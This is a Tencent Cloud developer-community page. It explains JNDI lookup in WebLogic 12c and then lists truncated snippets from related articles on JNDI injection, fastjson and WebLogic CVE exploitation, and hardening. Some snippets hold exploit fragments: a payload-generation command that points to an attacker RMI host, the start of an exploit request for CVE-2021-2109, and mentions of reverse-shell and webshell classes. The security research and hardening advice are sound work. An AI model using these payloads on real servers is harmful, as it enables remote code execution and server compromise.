开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

weblogic 12c中的JNDI查找

WebLogic 12c中的JNDI查找是指在WebLogic Server 12c中使用Java命名和目录接口（Java Naming and Directory Interface，JNDI）来查找和访问命名对象的过程。JNDI是Java平台提供的一种标准API，用于在分布式环境中查找和访问命名和目录服务。

JNDI查找在WebLogic 12c中具有以下特点和优势：

分布式访问：JNDI允许在分布式环境中查找和访问命名对象，使得应用程序可以通过网络访问远程资源。
松耦合：通过使用JNDI，应用程序可以将资源的位置和配置信息与应用程序的代码分离，实现松耦合的设计。
可扩展性：WebLogic 12c支持自定义JNDI提供者，可以根据需要扩展和定制JNDI服务。
高性能：WebLogic 12c的JNDI实现经过优化，具有较高的性能和吞吐量。

在WebLogic 12c中，可以通过以下步骤进行JNDI查找：

创建InitialContext对象：使用javax.naming.InitialContext类创建一个JNDI上下文对象。
设置JNDI环境属性：根据需要设置JNDI上下文的环境属性，例如提供者URL、认证信息等。
查找命名对象：使用JNDI上下文对象的lookup()方法查找指定名称的命名对象。
使用命名对象：获取到命名对象后，可以使用它来执行相应的操作，例如调用方法、获取属性等。

WebLogic 12c提供了丰富的JNDI相关功能和配置选项，可以满足各种应用场景的需求。对于JNDI查找，可以参考WebLogic 12c的官方文档中的相关章节进行详细了解和配置。

推荐的腾讯云相关产品和产品介绍链接地址：

腾讯云容器服务（Tencent Kubernetes Engine，TKE）：https://cloud.tencent.com/product/tke
腾讯云云数据库Redis版（TencentDB for Redis）：https://cloud.tencent.com/product/redis
腾讯云云服务器（CVM）：https://cloud.tencent.com/product/cvm
腾讯云对象存储（Tencent Cloud Object Storage，COS）：https://cloud.tencent.com/product/cos
腾讯云区块链服务（Tencent Blockchain as a Service，TBaaS）：https://cloud.tencent.com/product/tbaas

请注意，以上推荐的腾讯云产品仅供参考，具体选择应根据实际需求和情况进行。

相关搜索:JMS资源的客户端上的JNDI查找失败 Myfaces应用程序的Weblogic 12c部署 Spring boot应用无法通过weblogic中的jndi连接 Weblogic 12:为EJB定义特定的JNDI名称 Weblogic 12c (12.2.1.4) web控制台针对不同环境的不同颜色 Weblogic 12c上的Spring-boot之战 Weblogic 12c中WebAppModule的weblogic未解析Webapp库引用 weblogic 12c中的会话ID长度(字符)增加 Weblogic 12c支持的Oracle数据库版本使用Weblogic、JNDI和SSL的自定义套接字连接

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

java当中JDBC当中JNDI用来查找dataSource的例子

8.JNDI用来查找dataSource的例子： import javax.naming.InitialContext; import javax.naming.Context; import com.mysql.jdbc.jdbc2...prop.setProperty(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.fscontext.RefFSContextFactory...Exception e) { e.printStackTrace(); } } } 上面的程序只是存入硬盘，想查找出来得用下面的程序...prop.setProperty(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.fscontext.RefFSContextFactory

5463 0

fastjson中的jndi注入

0x01 前言前一章简单介绍了jndi注入的知识，这一章主要是分析一下fastjson 1.2.24版本的反序列化漏洞，这个漏洞比较普遍的利用手法就是通过jndi注入的方式实现RCE，所以我觉得是一个挺好的...JNDI注入实践案例。...name\":\"axin\"}"; User user = JSON.parseObject(str, User.class); } } 运行该类，得到如下结果，说明反序列化的过程中确实调用了...就是利用@type属性以及自动调用setXXX方法，如果我们能够找到一个类，而这个类的某个setXXX方法中通过我们的精心构造能够完成命令执行不就行了嘛~ com.sun.rowset.JdbcRowSetImpl...的lookup方法调用，且参数就是我们在setDataSourceName中设置的dataSourceName。

1.7K2 1

深入理解JAVA中的JNDI注入

简单来说，JNDI (Java Naming and Directory Interface) 是一组应用程序接口，它为开发人员查找和访问各种资源提供了统一的通用接口，可以用来定位用户、网络、机器、对象和服务等各种资源...JNDI References 在JNDI服务中，RMI服务端除了直接绑定远程对象之外，还可以通过References类来绑定一个外部的远程对象（当前名称目录系统之外的对象）。...当客户端在lookup()查找这个远程对象时，客户端会获取相应的object factory，最终通过factory类将reference转换为具体的对象实例。...一共有两处可执行RMI中定义的恶意代码的地方，一处是getObjectFactoryFromReference，在getObjectFactoryFromReference中会通过获取到对应的Class...; return null; } } JdbcRowSetImpl的JNDI注入利用链在实战过程中，context.lookup直接被外部调用的情况比较少，但是我们可以通过间接调用

2.2K4 0

第48篇：Weblogic最新漏洞修复方法（禁用T3+IIOP协议）

通过官方的漏洞描述来看，应该还是借助jndi来实现反序列化漏洞利用，所以此漏洞成功条件是目标一定要出网，而且T3或IIOP协议开放。...1 禁用T3协议过程进入weblogic的后台之后，选择“安全”—“筛选器”，在“连接筛选器规则”输入 weblogic.security.net.ConnectionFilterImpl 连接筛选器规则中输入...接下来在“协议”—“IIOP”中，取消“启用IIOP”的勾选，点击“保存”。如果是weblogic9.x版本，操作方法大同小异，按照下图方法进行设置。之后点击“激活更改”。...禁用IIOP协议（12.1.3.0.0-12c版本）经过测试，weblogic 12.1.3.0.0、weblogic 12.2.1.3.0（12c）、weblogic14.x（14c）版本禁用IIOP...也可以在weblogic前面放置一个Nginx，只对HTTP协议进行转发，对T3协议及IIOP协议不进行转发，但是这种方法只能杜绝外网攻击，无法杜绝内网横向中对于weblogic反序列化漏洞的攻击。

1.7K2 0

DAO层配置绑定weblogic应用服务器的JNDI导致单元测试失败

背景项目用的weblogic，每次改了java或者xml文件等，都需要重新部署项目并启动容器才可以生效，且不支持热部署，导致开发效率低。...问题解决原来是项目中的jndi配置的内容用的是weblogic容器的jndi。...而weblogic是和数据源进行配置绑定好了，这就导致单元测试在脱离应用服务器的环境下无法启用因此单元测试的DB连接配置修改成，用于跟weblogic解耦合 <bean id="ppcbDs

3841 0

Java 中 RMI、JNDI、LADP、JRMP、JMX、JMS那些事儿（上）

中的JRMP exploit，然后又想起了RMI、JNDI、LDAP、JMX、JMS这些词。...可以使用JNDI或RMI注册表（可以看到上面Java RMI我使用了Registry，后面Weblogic RMI中我使用的是JNDI方式，两种方式对RMI服务都是可以的）来绑定或查找服务器端RMI对象...JNDI是Java API，允许客户端通过名称发现和查找数据、对象。...LDAP攻击向量攻击过程如下： 1.攻击者为易受攻击的JNDI查找方法提供了一个绝对的LDAP URL 2.服务器连接到由攻击者控制的LDAP服务器，该服务器返回恶意JNDI 引用 3.服务器解码JNDI...，触发本地Gadget"部分LDAP与JNDI search() lookup()方式是我们能控制ctx.lookup()参数进行对象的查找，LDAP服务器也是攻击者创建的。

3.8K1 1

Oracle 12c中的SQLJSON函数

本文提供了Oracle Database 12c第2版（12.2）中引入的SQL / JSON函数的示例。...建立测试表及数据本文中的示例使用以下表： JSON_OBJECT函数 JSON_OBJECT函数将逗号分隔的键值对列表转换为JSON中的对象成员。...JSON_OBJECTAGG聚合函数 JSON_OBJECTAGG聚合函数创建一个JSON对象，其中包含通过聚合每行中的键值对形成的对象成员列表。...JSON_ARRAYAGG聚合函数 JSON_ARRAYAGG聚合函数类似于LISTAGG函数，将每行的表达式聚合到单个JSON数组中。...复杂的JSON 对象每个函数调用本身可以是一个表达式，所以他们可以很容易地组合创建复杂的JSON对象。如果我们将JSON格式化，我们可以看到更好的结构。

2.7K3 0

Oracle 12c中的转换功能增强

Oracle Database 12c Release 2（12.2）包括对数据类型转换函数的许多增强，从而更容易处理转换错误。...创建测试表及初始化数据本文中的示例所用的表： CREATE TABLE t1 ( data VARCHAR2(20) ); INSERT INTO t1 VALUES ('11111'); INSERT...INTO t1 VALUES ('01-JAN-2016'); INSERT INTO t1 VALUES ('AAAAA'); COMMIT; CAST 和 TO_* 转换函数在以前的数据库版本中...SELECT TO_NUMBER(data) FROM t1; ERROR: ORA-01722: invalid number no rows selected SQL> 在Oracle数据库12.2中，...16 12.00.00.000000000 AM SQL> VALIDATE_CONVERSION 函数 VALIDATE_CONVERSION函数用于测试转换是否成功，从而可以排除在操作期间导致问题的数据

5003 0

Oracle 12c系列(十) | 12c中的Recovering Tables and Table Partitions

在Oracle12c之前的版本中，rman进行数据恢复时只能进行database/tablespace/datafile/block四种级别的恢复，如果误操作删除某张表或表中数据，无法通过闪回进行数据还原时...，该特性可以直接从现有的rman备份中来恢复表/表分区，且恢复的过程不影响数据库中的其他的对象。...4.通过数据泵功能将需要恢复的表在辅助数据库中导出到指定目录下。 5.将需要恢复的表导入到生产库中。 6.清理辅助数据库。...3.无法恢复备库中的表/表分区。 4.当使用REMAP选项时无法恢复具有NOT NULL约束的表。...在恢复表的过程中观察服务器中的后台实例情况，可以发现为EyDp的SID的辅助数据库，该库即为恢复表时自动创建的辅助数据库，如下： [oracle@node1 ssd2]$ ps -ef | grep pmon

8512 0

Java命名和目录接口（JNDI）详解

尽管JNDI可以用于任何类型的Java对象，但在Java EE环境中，它主要用于查找和访问企业级服务。...）等服务都可以注册到JNDI，然后在程序中通过名字查找和使用。...JNDI在Java EE中的使用让我们以Java EE应用服务器（如Tomcat、WebLogic、JBoss等）中的数据源作为例子，深入了解JNDI的使用。...通过使用Context.lookup()方法，我们可以从JNDI中查找到对应的数据源对象。...服务发现：JNDI不仅可以用于查找服务，还可以浏览服务，这对于服务发现和微服务架构非常有用。结语总的来说，JNDI是Java EE中不可或缺的一部分，它在服务查找和访问中扮演着关键角色。

6041 0

Weblogic渗透测试指南

About WebLogic WebLogic是美商Oracle的主要产品之一，系购并得来。...是商业市场上主要的Java（J2EE）应用服务器软件（application server）之一，是世界上第一个成功商业化的J2EE应用服务器，目前已推出到12c（12.1.1）版。...复现的时候有几个小问题，JRMP Server的ip需要填本地主网卡（用于上网的那个）的ip 然后在物理机上攻击虚拟机中映射出来的docker环境不知道为什么没有成功以及自己在虚拟机上搭建的weblogic10.3.6...https://github.com/jas502n/CVE-2018-3191 需要先生成一个payload java -jar weblogic-spring-jndi-10.3.6.0.jar...rmi://攻击机ip:端口/exp > payload java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://172.20.0.1:8888/exp >

1.7K4 0

关于 Java 中的 RMI-IIOP

，在16年Blackhat JNDI注入议题中也提到了这个协议的利用，当时想着没太看到或听说有多少关于IIOP的漏洞（可能事实真的如此吧，在下面Weblogic RMI-IIOP部分或许能感受到)，所以那篇文章写作过程中也没去看之前那个...Weblogic中的RMI-IIOP Weblogic默认是开启了iiop协议的，如果是上面这样的话，看通信数据以及上面的调用过程极大可能是不会经过Weblogic的黑名单了。...在上面RMI-IIOP的测试中，客户端要调用远程需要用到客户端的Stub类，去查找了下ejb/mgmt/MEJB对应的实现类weblogic.management.j2ee.mejb.Mejb_dj5nps_HomeImpl...，通过查找也确实没有找到对应的类。...JNDI中的利用在JNDI利用中有多种的利用方式，而RMI-IIOP只是默认RMI利用方式（通过JRMP传输）的替代品，在RMI默认利用方式无法利用时，可以考虑用这种方式。

1.3K2 0

LInux中的查找

LInux中的查找一、grep 二、find 2.1 基本用法 2.2 -exec 命令选项 2.3 配合 xargs 命令三、awk 一、grep Global Regular Expression...参考文章二、find 2.1 基本用法用于在文件树中（目录结构下）查找文件，并作出相应的处理。命令参数 pathname: find命令所查找的目录路径。...-exec 参数后面跟的是command命令，它的终止是以;为结束标志的，考虑到各个系统中分号会有不同的意义，前面加反斜杠\。示例在目录中查找更改时间在n日以前的文件并删除它们 find ....“account”中，匹配“root”字段的行。...查找系统中的每一个普通文件，然后使用xargs命令来测试它们分别属于哪类文件 # 显示为： # ./log2013.log: empty # .

16.1K1 0

从流量侧浅谈WebLogic远程代码执行漏洞（CVE-2018-3191）

T3协议是用于Weblogic服务器和其他Java Application之间传输信息的协议，是实现上述RMI远程过程调用的专有协议，其允许客户端进行JNDI调用。...是特定于Java技术的、用于查找和引用远程对象的协议。这是运行在RMI之下、TCP/IP之上的线路层协议），用于接收被攻击方的Weblogic请求，并执行指定的bash反弹命令。...类加入到黑名单中，因此导致了Spring JNDI注入的发生。...通过我们对CVE-2018-3191 POC的分析，在此类中，其主要是使用了JtaTransactionManager这个类进行Spring JNDI注入，这点我们也可以在流量端有所发现： ?...通过Weblogic中base_domain的设置页面的"安全"->"筛选器"来进行配置和防御，具体方法不再赘述，请参考网络资料。

1.4K2 0

java学习：weblogic下JNDI及JDBC连接测试(weblogic环境)

JNDI的专业解释，大家自行去网络搜索吧，这里就不啰嗦了。单纯从使用角度看，可以简称把它看成一个key-value的“哈希资源”容器。...给定一个string类型的key，可以把任何类型的value，放入这个容器（通过bind/rebind方法）；其它地方需要使用该资源时，根据key就能取出该资源（通过lookup方法） JNDI使用示例...JDBC数据源，实际上，也是使用JNDI服务来访问的，下面是JDBC示例代码:(必须先在weblogic中创建数据源) package jmyang.weblogic; /** * Title...(注:infoskysso要在weblogic中设置数据源) } catch (NamingException e) { e.printStackTrace();...中创建jdbc数据源的方法 ?

1.7K9 0

CVE-2021-2109：Weblogic远程代码执行分析复现

CVE-2021-2109 中，攻击者可构造恶意请求，造成JNDI注入，执行任意代码，从而控制服务器。...0x04 环境搭建与CVE-2020-14645复现时的搭建方式相同 0x05 漏洞复现选用jdk-8u181，weblogic12.1.4.0 搭建漏洞环境，因为是通过 JNDI 注入进行的远程命令执行...，所以会受到 JDK 版本的影响 JNDI 注入的 JDK 版本如图所示 ?...我们在 JNDIBindingAction 类的函数 execute 中，看到了 JNDI 注入的关键函数 lookup，通过 lookup 去引用命名服务(RMI)和目录服务(LDAP) console.jar...我们想要控制的参数都可以通过控制 objectIdentifier 的值来实现。this.objectIdentifier 是在 JndiBindingHandle 类中的构造函数中初始化的。

3.3K1 0

JavaScript中的变量查找

众所周知，JavaScript变量是按照作用域链来进行查找的（作用域和作用域链相关知识可参看我的另一篇文章，《基于JavaScript作用域链的性能调优》），那么，对于一个简单的赋值操作，等号左右两边变量的查找方式一样吗...LHS(left-hand-side左查找)和RHS(right-hand-side右查找) 概念如下： LHS查询：试图找到变量容器本身，从而可以对其进行赋值 RHS查询：查找某个变量的值对于一个赋值语句...var a = b;，等号左侧进行LHS查询，等号右侧进行RHS查询；如果是一个普通的打印语句console.log(a)，那么，查找变量a属于RHS查询。...两者的相同之处：都遵循作用域链查找。 2....参考文章首部的例子： b = 4; console.log(b); // 4 delete b; console.log(window.b); // undefined 程序中并没有声明变量b，但是由于

1.5K1 0

WebLogic中的一些基本概念

WebLogic 中的基本概念上周参加了单位组织的WebLogic培训，为了便于自己记忆，培训后，整理梳理了一些WebLogic的资料，会陆续的发出来，下面是一些基本概念。...Domain 中包含一个特殊的 WebLogic 服务器实例，叫做 Administration Server，这是我们配置、管理Domain中所有资源的核心。...需要注意的是，集群中的WebLogic Server必须版本号一致。...J2EE框架中的其他内容：JDBC、JNDI、JTA、JMS、JAAS、JMX、RMI-IIOP等。...JAVA编程中的一个非常重要的概念。

9931 0

Weblogic JNDI远程代码执行漏洞（CVE-2021-2109）

前言持续更新：整理下渗透测试工作中发现过的漏洞（包含漏洞描述、漏洞等级、漏洞验证、修复建议），这里不深究漏洞产生的各种后利用或者绕过方式，漏洞验证过程不局限于文章中的方法，能够证明漏洞存在即可。...0x01 漏洞描述 - Weblogic JNDI远程代码执行漏洞（CVE-2021-2109） - Weblogic Server是Oracle公司的一款适用于云环境和传统环境的应用服务器，它提供了一个现代轻型开发平台...在Oracle官方发布的2021年1月关键补丁公告中，发布了针对WebLogic Server的严重漏洞(CVE-2021-2109)，该漏洞是存在于WebLogic Console控制台中的一个远程代码执行漏洞...正常利用管理员帐号登录Weblogic Console控制台的情况下，通过BurpSuite抓取登录后带Cookie数据包进行JNDI注入： GET /console/consolejndi.portal...1764575979 Upgrade-Insecure-Requests: 1 没有登录Weblogic Console控制台的情况下，配合CVE-2020-14882权限绕过漏洞进行JNDI注入： GET

9061 0

第16篇：Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程

前两期分享了《第14篇：Struts2框架下Log4j2漏洞检测方法分析与总结》、《第15篇：内网横向中windows各端口远程登录哈希传递的方法总结》，本期讲解一个Weblogic拿权限案例。...1 CVE-2019-2729的JNDI出网利用这是其中一个能用的EXP，同时也意味着CVE-2017-10271、CVE-2019-2725漏洞均被打了补丁了，不能用，而且weblogic版本大致是...CVE-2019-2729的JNDI尝试接下来就把目光放在CVE-2019-2729这个JNDI的exp上了，首先编写一个实现了反弹shell功能的MyEvilClass.java文件，从ysoserial...用Java代码中的PrintWriter类去写入一个Webshell就行了，终端防护总不能连正常的java类写文件操作都拦截吧。但是一个问题又来了，如何知道网站的绝对路径呢？...info可以直接得到网站的绝对路径（看下图的右下角）将上述网站绝对路径放到MyEvilClass.java文件中，完成一个写文件的操作。

1K1 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭